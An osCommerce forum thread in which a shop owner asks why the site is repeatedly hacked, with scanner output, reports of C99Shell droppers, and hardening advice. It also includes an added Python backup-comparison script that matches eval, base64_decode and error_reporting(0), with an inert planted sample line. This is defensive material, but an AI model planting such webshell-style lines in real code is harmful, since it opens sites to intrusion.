
osCommerce


Hacked AGAIN! advice please


Guest


Hi all.

Can anyone help or advise me before I give it up altogether.

I've never been hacked before til about 3 weeks ago, and boy are they making up for missed time! I've now been hacked about 20 times these past 3 weeks. Not sure if it's individual incidents, or if some code's been added somewhere that makes it happen (is that possible?)

I have: renamed my "admin"; deleted "filemanager" from admin; deleted "define languages" from admin; added "Security Pro"; added "Sitemonitor". My 2 configure files have permissions of 444; other files are no higher than 755.

I keep backing up my files, so replacing them is no problem (which is why it seems strange if it is some stray code, as I'm sure (?) my backup's ok (how sure can I be - I've checked every file!)).

Is anyone aware of security risks with the FCKEditor? A couple of times when I've been hacked my antivirus (AVG) has prevented me from opening a page that would use this. Plus today, when in "define mainpage", one of the popups from the editor had some strange code on the top of it. And when I run "Sitemonitor", there's always a long list of fckeditor files mentioned. Maybe it's all just coincidence.

I'm showing here the script that was used today (as far as I can tell, the same script that's been used before, but not every time), and also the rubbish that appeared on top of my home page today (which is how I knew I'd been stung yet again - this also mentions fckeditor! - I'm hoping it's not that that's the problem cos I couldn't do without it!). I've also added my Sitemonitor results, which makes this a long post - I apologise for this but I have no idea if the information in it would mean anything to anyone. I've started to check all the files mentioned in the report and they are ok (will continue the check after I've posted this).

Thanks for bothering to read this far, and I look forward to any help anyone can offer.

:)

This was on my homepage:

x3cx68x74x6dx6cx20x3ex3cx68x65x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3ex3cx68x74x6dx6cx20x3ex3cx68x65x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3ex3cx68x74x6dx6cx20x3ex3cx68x65x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3ex3cx68x74x6dx6cx20x3ex3cx68x65x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3ex3cx68x74x6dx6cx20x3ex3cx68x65x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3e
Parse error: syntax error, unexpected '<' in /home/simplysc/public_html/myadmin/fckeditor/fckeditor.php on line 32

This is the script:


And this is the result of my most recent Sitemonitor check:

363 datafeed_shopmania_oscommerce.php - hacker code = eval

80 download.php hacker code = eval

47 google3dfac2925e63.php hacker code = error_reporting(0)

47 googlecf0340a99daf.php hacker code = error_reporting(0)

68 translucent_scroller.js hacker code = eval

18 ext/jQuery/jQuery.js hacker code = eval

511 includes/checkout/checkout.js hacker code = eval

471 includes/classes/nusoap/lib/class.soap_parser.php hacker code = base64_decode

525 includes/classes/nusoap/lib/class.soap_server.php hacker code = eval

597 includes/classes/nusoap/lib/class.soapclient.php hacker code = eval

6257 includes/classes/nusoap/lib/nusoap.php hacker code = base64_decode

83 includes/functions/compatibility.php hacker code = eval

492 includes/functions/general.php hacker code = eval

1 includes/languages/english/cookie_usage.php hacker code = eval

92 includes/languages/english/define_mainpage.php hacker code = eval

39 includes/modules/payment/payofflinepro.php hacker code = base64_decode

352 includes/modules/payment/paypal_standard.php hacker code = base64_decode

130 /configuration.php hacker code = eval

1839 /easypopulate.php hacker code = eval

212 /modules.php hacker code = eval

19 /sitemonitor_configure.php hacker code = error_reporting(0)

252 fckeditor/fckeditor.js hacker code = eval

33 /fckeditor/editor/_source/fckeditorapi.js hacker code = eval

78 /fckeditor/editor/_source/classes/fckxml_gecko.js hacker code = eval

461 /fckeditor/editor/_source/internals/fck_gecko.js hacker code = eval

55 /fckeditor/editor/_source/internals/fcktoolbarset.js hacker code = eval

122 /fckeditor/editor/dialog/fck_link.html <frame

200 /fckeditor/editor/dialog/fck_link/fck_link.js eval

13 /fckeditor/editor/dialog/fck_spellerpages/spellerpages/controlWindow.js hacker code = eval

5 /fckeditor/editor/dialog/fck_spellerpages/spellerpages/spellChecker.js hacker code = eval

209 /fckeditor/editor/dialog/fck_spellerpages/spellerpages/wordWindow.js hacker code = eval

117 /fckeditor/editor/filemanager/browser/default/js/fckxml.js hacker code = eval

35 /fckeditor/editor/filemanager/connectors/php/basexml.php hacker code = eval

59 /fckeditor/editor/js/fckadobeair.js hacker code = eval

31 /fckeditor/editor/js/fckeditorcode_gecko.js hacker code = eval

38 /fckeditor/editor/js/fckeditorcode_ie.js eval

110 /fckeditor/editor/lang/sl.js hacker code = eval

169 /fckeditor/editor/wsc/w.html hacker code = eval

471 /includes/classes/phplot.php hacker code = eval

404 /includes/functions/general.php hacker code = eval

56 /includes/javascript/calendarcode.js hacker code = eval

75 /includes/javascript/spiffyCal/spiffyCal_v2_1.js hacker code = eval

60 /includes/modules/newsletters/product_notification.php hacker code = eval


I have: renamed my "admin";

Good. Is it also password-protected access?

deleted "filemanager" from admin; deleted "define languages" from admin;

Did you also delete the files themselves (file_manager.php, define_language.php)? It does no good to simply remove the links to them in admin.

added "Security Pro"; added "Sitemonitor".

Not familiar with them, but I think they only may alert you to changes, not prevent them.

My 2 configure files have permissions of 444; other files are no higher than 755.

Files should be 644. Directories are 755.

 

Well, if you're being constantly hacked, it's possible there's a hacked file that you're overlooking, or a planted backdoor script. Don't just replace all the osC files -- erase every file before replacing them with clean copies (including product images). How sure are you that your backups are unhacked? You may want to do a clean install (saving the database) and re-install all your add-ons. Have you scanned your PC (used to administer osC) for spyware (password sniffers and keystroke loggers) and changed all your site, FTP, and account passwords?

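Phil's advice to look for the overlooked hacked file or planted backdoor can be mechanised. The script below is an added example (not from the thread, osCommerce or Sitemonitor): it hashes a clean backup and the live web root, lists files that were added or changed, and reports for those files only the eval / base64_decode / error_reporting(0) tokens Sitemonitor flags, so legitimate libraries that use eval (jQuery, nusoap, FCKeditor) do not drown the result. The directory layout and file contents are constructed for the demo.

```python
import hashlib
import os
import re
import tempfile

# The same tokens Sitemonitor reports above: eval, base64_decode, error_reporting(0)
SUSPICIOUS = re.compile(r"\b(?:eval|base64_decode)\s*\(|\berror_reporting\s*\(\s*0\s*\)")

def tree_hashes(root):
    """Map each file's path (relative to root) to its SHA-256 digest."""
    out = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as f:
                out[os.path.relpath(full, root)] = hashlib.sha256(f.read()).hexdigest()
    return out

def flagged_lines(path):
    """(line number, token) pairs, the way Sitemonitor prints '363 file.php hacker code = eval'."""
    hits = []
    with open(path, encoding="utf-8", errors="replace") as f:
        for n, line in enumerate(f, 1):
            for m in SUSPICIOUS.finditer(line):
                hits.append((n, m.group(0).split("(")[0].rstrip()))
    return hits

def compare_trees(live_root, clean_root):
    """Files that exist only in the live tree, differ from the clean copy, or vanished."""
    live, clean = tree_hashes(live_root), tree_hashes(clean_root)
    added = sorted(p for p in live if p not in clean)
    modified = sorted(p for p in live if p in clean and live[p] != clean[p])
    missing = sorted(p for p in clean if p not in live)
    # Legitimate files also contain eval, so only new or changed files are scanned
    flagged = {p: flagged_lines(os.path.join(live_root, p)) for p in added + modified}
    return {"added": added, "modified": modified, "missing": missing, "flagged": flagged}

def demo():
    # Constructed sample: a clean copy and a live copy with one planted and one altered file
    base = tempfile.mkdtemp()
    clean, live = os.path.join(base, "clean"), os.path.join(base, "live")
    for root in (clean, live):
        os.makedirs(os.path.join(root, "includes/functions"))
        with open(os.path.join(root, "index.php"), "w") as f:
            f.write("<?php require('includes/application_top.php'); ?>\n")
        with open(os.path.join(root, "includes/functions/general.php"), "w") as f:
            f.write("<?php function tep_href_link($p) { return $p; }\n")
    # Planted file and appended line (constructed and inert: the base64 decodes to 'foo')
    with open(os.path.join(live, "media.php"), "w") as f:
        f.write("<?php error_reporting(0); eval(base64_decode('Zm9v')); ?>\n")
    with open(os.path.join(live, "includes/functions/general.php"), "a") as f:
        f.write("eval(base64_decode('Zm9v'));\n")
    return compare_trees(live, clean)
```

Run `compare_trees("/path/to/public_html", "/path/to/clean_backup")` against a backup taken before the first incident; the "added" list is where droppers like the media.php Ken mentions later in the thread show up, and "missing" catches files that were deleted.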

I had a similar problem to yours.

See my post here:

"My website was hacked. It showed the "x3cx68x74x6dx6cx20x3ex3cx68x65x61x64x20x3ex3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x3ex3cx2fx62x6fx64x79x3ex3cx2fx68x74x6dx6cx3e" string many times on the home page and admin page.

The home page also showed "Warning:session_start()[function.session-start]:cannot send session cache limiter-headers already sent (output started at /home/gplustr1/pubile_html/included/functions/compatibility.php:179) in /home/gplustr1/public_html/included/fuctions/sessions.php on line 102"

 

My website has been hacked many times these few weeks. Always the same problem.

I had backed up the website and checked it with NOD32 antivirus, then I found the virus called: public_html/user_profiles.php - PHP/C99Shell.W trojan

Then I removed the virus and restored my website with a clean backup (I think it is a cleaned file). I downloaded the backup file again and ran the antivirus again, and then it could not find the virus.

But the same problem happened again after only two days. I really don't know why. Does anyone know how to solve it?

Thanks for your help.

Thanks"

 

Have you solved the problem?

Thanks



Hi Phil, and thanks for responding.

Between posting this last night and logging into admin again this morning, I've been hacked yet again, so it really does seem like it's an overlooked file. The bother is I shall want to know where, so I shall be going through them all again. But a clean install looks like the only way to go. I have so many add-ons that I only wanted to do that as a last resort. Looks like it's last resort time!

Yes, admin is password protected

Yes, I did delete those files

Files are 644 and directories are 755

I have scanned my PC (done every day)

I hadn't changed my passwords (seems like an obvious thing to do so don't ask why not!)

Thanks for the pointers, appreciate it.

Chris

:)

 

Just checked my site and it LOOKS fine, the only apparent evidence today is the "x3cx2fx68x65x61x64x3ex3cx62x6fx64x79x20x" across the top of admin


My site has also been attacked by some person in Indonesia. You've got to watch out for the IP address 114.79.55.211; check your logs, and if they have accessed your site, recheck your file names again.

My admin area has Security Pro installed, is password protected, and is PCI-compliant with McAfee Secure, but they were still able to get into my admin folder to add his email [email protected] as the admin email.

What he does is upload 2 files to my root location; one is called media.php, the other one is checkout_userinfo.php.

 

ken


Ken, did you rename your "admin" directory, password-protect it, and take other security measures (including removal of file_manager and define_language) as suggested on this forum? That should keep anyone from getting into your admin folder.


  • 7 months later...

I know that this is an old post but I'm having a similar issue here. I deleted THE ENTIRE ADMIN FOLDER and the hacker breaks in again to put a redirect trojan in some of my files. He doesn't use FTP or the admin folder to hack.


Does he use your computer?


Your customized script or some contrib that you used has a security hole.

1. Allow only your IP address in admin using .htaccess.

2. Place a .htaccess in includes and images so that no .php can be executed.

3. Disable shell (request it from your hosting company).

4. If no development is needed, do not set write permission.
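The .htaccess fragments for steps 1 and 2 of the list above, written out as an added example (not from the post's author or from osCommerce). The admin directory name and the address 203.0.113.10 are placeholders for your renamed admin folder and your own IP; AllowOverride must permit these directives on the host.

```apache
# <renamed-admin>/.htaccess  (step 1: only your own address reaches the admin area)
# Apache 2.2 syntax: with Order Deny,Allow the Allow line wins for the listed IP
Order Deny,Allow
Deny from all
Allow from 203.0.113.10
# Apache 2.4 equivalent (do not mix with the Order/Deny/Allow lines above):
# Require ip 203.0.113.10

# includes/.htaccess and images/.htaccess  (step 2: no .php in these directories
# is ever served over the web, so a dropper uploaded there cannot be reached).
# PHP's own require() of includes/application_top.php still works: it reads the
# file from disk and never goes through the web server.
<FilesMatch "\.(php|php5|phtml)$">
    Order Allow,Deny
    Deny from all
</FilesMatch>
# Apache 2.4 equivalent inside the FilesMatch block:
# Require all denied
```

Step 3 (no shell access) and step 4 (no write permission outside upload directories) are host-side settings and have no .htaccess form.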

Archived

This topic is now archived and is closed to further replies.
